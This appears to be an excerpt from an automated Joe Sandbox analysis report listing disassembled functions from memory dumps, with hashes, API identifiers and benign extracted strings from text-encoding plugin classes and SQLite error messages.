                                                                                                                                                                                                                • Instruction ID: 74a5f5fd76f9ae0da2d8fffb641dc901bc80bd4386effbd94bdfcc1ef5db707b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 342a4cd3f7d259d24aeb9a776a1e708ee513c6b05d4146dbb2a3107d3dc6b54c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23319E21F08742C5EB489BA9E4A537C6390BF44BE4F585131DA3E467D5EE2CE4C4C702
                                                                                                                                                                                                                Function 00007FF8E71462D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined, xrefs: 00007FF8E71462E8
                                                                                                                                                                                                                • 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FF8E714635C
                                                                                                                                                                                                                • int, xrefs: 00007FF8E71463E6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuspiciousDuplicateAccentPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-543361526
                                                                                                                                                                                                                • Opcode ID: 1291b6d293bf1ed5ae64a56b00bf1b13860b617c90494c0dd0123d29bd04fbc4
                                                                                                                                                                                                                • Instruction ID: bc880aded92d43da184fb2f003b4ff373943a18068d4e5372473d1c504bdd559
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1291b6d293bf1ed5ae64a56b00bf1b13860b617c90494c0dd0123d29bd04fbc4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B31A371B08782C1EA589BA5E4953BC23B0EF44BD8F584131DA7E477E9FE2CE4948702
                                                                                                                                                                                                                Function 00007FF8E7145130 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted, xrefs: 00007FF8E71451BC
                                                                                                                                                                                                                • int, xrefs: 00007FF8E7145246
                                                                                                                                                                                                                • attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined, xrefs: 00007FF8E7145148
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManySymbolOrPunctuationPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-4240200891
                                                                                                                                                                                                                • Opcode ID: 536accf797a1bbe65dc8a4d75f5ab69cf8332c7d165fc34bcb50e14afcb09dcc
                                                                                                                                                                                                                • Instruction ID: 21c6d4c0a43952854b3e4df79352773cce43b15d60cf3433fae00060b8d8e5e8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 536accf797a1bbe65dc8a4d75f5ab69cf8332c7d165fc34bcb50e14afcb09dcc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2231A071F08742C2EA589BA5E49537D23A0EF44BE4F584131DA3D47795EE2CE484E702
                                                                                                                                                                                                                Function 00007FF8E7145730 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'TooManyAccentuatedPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'TooManyAccentuatedPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-2022335554
                                                                                                                                                                                                                • Opcode ID: cef47ad94a8524b23c3b55ca13b9a14f862f4f76f789291d3bde506f314e6f26
                                                                                                                                                                                                                • Instruction ID: 29a94bffbe6d50b691ab6f0936c7025603f82a35fd2a44b692b9935e738e42a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cef47ad94a8524b23c3b55ca13b9a14f862f4f76f789291d3bde506f314e6f26
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1316D21F08746C1EA489BA5E49537C23A0BF84BD4F984131DA2E46795EE2CE484A702
                                                                                                                                                                                                                Function 00007FF8E7148330 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted, xrefs: 00007FF8E71483BC
                                                                                                                                                                                                                • attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined, xrefs: 00007FF8E7148348
                                                                                                                                                                                                                • int, xrefs: 00007FF8E7148446
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'ArchaicUpperLowerPlugin' object attribute '_character_count_since_last_sep' cannot be deleted$attribute '_character_count_since_last_sep' of 'ArchaicUpperLowerPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-2037488444
                                                                                                                                                                                                                • Opcode ID: 1006a038ca7837f55bf567080db1d952f620b641b4547de6e2a8b337716dbb5f
                                                                                                                                                                                                                • Instruction ID: e1c204483fea1773f8c3de752d91c6da86519b8de7ffab7e138b20f130c162d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1006a038ca7837f55bf567080db1d952f620b641b4547de6e2a8b337716dbb5f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F316D71B08742C5EB589BA9E49537D23A0BF44BD4F584131DA6D477E5EE2CE4848702
                                                                                                                                                                                                                Function 00007FF8E7147500 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-3920090044
                                                                                                                                                                                                                • Opcode ID: cd35c19dcae03a46ba023d8733dc0448e3e938908ebc375541851ad2aa41712c
                                                                                                                                                                                                                • Instruction ID: c19c332d42635c54dd85b843d2c905602222e5cd2d48ca94e56e53fa91822eee
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd35c19dcae03a46ba023d8733dc0448e3e938908ebc375541851ad2aa41712c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84318171F08742C5EA589BA9E4953BC23A1EF44BD4F585131EA3E4B7D5EE2CE484C702
                                                                                                                                                                                                                Function 00007FF8E7147160 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'SuperWeirdWordPlugin' object attribute '_bad_word_count' cannot be deleted$attribute '_bad_word_count' of 'SuperWeirdWordPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-3520798986
                                                                                                                                                                                                                • Opcode ID: 77c8772b984a2595aac65ff4e3f8c76f4f621aa382ae6883f4a9f238d60c89b9
                                                                                                                                                                                                                • Instruction ID: 6bc03458b93f5b4bffe1b91627472b77e1a4700bc45c3f5c3878a9f79ade9e00
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77c8772b984a2595aac65ff4e3f8c76f4f621aa382ae6883f4a9f238d60c89b9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81319E61F08742C1EA589BA5E49537C23A1EF84BD4F584131EA7E467E5EE2CE4848702
                                                                                                                                                                                                                Function 00007FF8E7148B60 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'ArabicIsolatedFormPlugin' object attribute '_character_count' cannot be deleted$attribute '_character_count' of 'ArabicIsolatedFormPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-3970786323
                                                                                                                                                                                                                • Opcode ID: 2e629f3262497ccb22304782c1099c2c36976ab49dc67f606c1b062756317bff
                                                                                                                                                                                                                • Instruction ID: f1ec9330f4398fa8a93fb689c119e0a1868775385ddf63c6185b5fb7289eca11
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e629f3262497ccb22304782c1099c2c36976ab49dc67f606c1b062756317bff
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49318B71F18742C5EF589BA9E8953BC23A0AF44BD4F584131DA2E467D4EE2CE4848702
                                                                                                                                                                                                                Function 00007FF8E7147B40 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'CjkInvalidStopPlugin' object attribute '_wrong_stop_count' cannot be deleted$attribute '_wrong_stop_count' of 'CjkInvalidStopPlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-420147485
                                                                                                                                                                                                                • Opcode ID: d003440fe6475c9f59ed82b76a527c73c740b1cb598ce72131a3b28642e6cd38
                                                                                                                                                                                                                • Instruction ID: 0ec64b9c71617785f7f874c43f79ee46bc20856df9ddc5022d39ce67f0efc838
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d003440fe6475c9f59ed82b76a527c73c740b1cb598ce72131a3b28642e6cd38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B31A031F08742C1EE589BA5E4953BC23A0EF54BE4F585131DA3E467D4EE2CE584C702
                                                                                                                                                                                                                Function 00007FF8E7145B50 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: 'UnprintablePlugin' object attribute '_unprintable_count' cannot be deleted$attribute '_unprintable_count' of 'UnprintablePlugin' undefined$int
                                                                                                                                                                                                                • API String ID: 1450464846-2997357838
                                                                                                                                                                                                                • Opcode ID: 05d8df805b557c735720644633408e4608b0fbfc31e106f8cc358c40349ee830
                                                                                                                                                                                                                • Instruction ID: 0a5becd8bbacfc4db46eec6cb0da30b396bc9cd5b9c79b4763029a7332206f3c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05d8df805b557c735720644633408e4608b0fbfc31e106f8cc358c40349ee830
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF31BC31B18742C1EE589BA9E4953BC23A1AF44BD4F584131DA3E477E4EE2CE484E702
                                                                                                                                                                                                                Function 00007FF8E714DED0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$FromLong_Ssize_t$ContainsNumber_Object_Set_Vectorcall
                                                                                                                                                                                                                • String ID: bool$feed
                                                                                                                                                                                                                • API String ID: 3415927029-2849697477
                                                                                                                                                                                                                • Opcode ID: eb45302e3cef5080e95074768180575d99dfa37b4141d0cc9422c2bb42ee7491
                                                                                                                                                                                                                • Instruction ID: 2569ce882e6e8a313b74d47b100ccd9d9084af0bd3c8a69a364b3016b41b24c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb45302e3cef5080e95074768180575d99dfa37b4141d0cc9422c2bb42ee7491
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3412E31E1CB42C2EB649F92E8553BE63A1EF44BC4F485035DBAD4775AEE2CE4818712
                                                                                                                                                                                                                Function 00007FF8E7146CF0 Relevance: 10.6, APIs: 7, Instructions: 82COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3617616757-0
                                                                                                                                                                                                                • Opcode ID: 527074c6cd195ab482c56603e858959c90a590d2c84401fac90cb2060dcc2367
                                                                                                                                                                                                                • Instruction ID: c5d4dfca2c473ebd2701405db3cb5b421e0f729561bb3e43215f6750882c3dbd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 527074c6cd195ab482c56603e858959c90a590d2c84401fac90cb2060dcc2367
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF41B432909B41C1EB698FB8D8483AC26B0AF55BFDF140334CABA411D9DF7EE4958302
                                                                                                                                                                                                                Function 00007FF8E7145630 Relevance: 10.6, APIs: 7, Instructions: 51threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2819143443-0
                                                                                                                                                                                                                • Opcode ID: 1c16e7615a0f82207d80faaa12bf775c49de3bd6999ef687b31fc543c5e7b3c6
                                                                                                                                                                                                                • Instruction ID: dc008311479bb4065938b10aacec258eedf6449698068ecd6a8641839c9fa22a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c16e7615a0f82207d80faaa12bf775c49de3bd6999ef687b31fc543c5e7b3c6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D214F31E08B42D1EB198FA5E54837C22A1AF54FE9F144234C93E462E4EF7CE4859342
                                                                                                                                                                                                                Function 00007FF8E6914DB0 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 330COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00007FF8E691514C
                                                                                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FF8E6914E5E
                                                                                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 00007FF8E6914E35
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                • API String ID: 438689982-272990098
                                                                                                                                                                                                                • Opcode ID: 26a60f2d29f2a27fc32945a5499dcfcea72275a31f881582fff33eec9206aef0
                                                                                                                                                                                                                • Instruction ID: 660d4b6eb267ba4b84c959dfb9bcae1d9c7d2d0f917b95b90101a9004440e7c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26a60f2d29f2a27fc32945a5499dcfcea72275a31f881582fff33eec9206aef0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99D122A2B28B8682EB61EF9590487B937A1FB45BC4F6A4131DE5D03786DF3CE441C702
                                                                                                                                                                                                                Function 00007FF8E68B49E0 Relevance: 9.3, APIs: 2, Strings: 4, Instructions: 329COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: abort due to ROLLBACK$another row available$no more rows available$unknown error
                                                                                                                                                                                                                • API String ID: 3510742995-3044471405
                                                                                                                                                                                                                • Opcode ID: e0751fcfef235c84794730e554eb4966c5351462047d42e6373d045085788445
                                                                                                                                                                                                                • Instruction ID: 962d72c27edafbb7894d6f181ef5065e5155d1128a157d08e62c66a78b78bf0e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e0751fcfef235c84794730e554eb4966c5351462047d42e6373d045085788445
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10F1B429B2DAAA81EBA49F94E4503BD67A0FF45BC8F1C4136DA4D03696CF3DE4458703
                                                                                                                                                                                                                Function 00007FF8E68D49C0 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 260COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
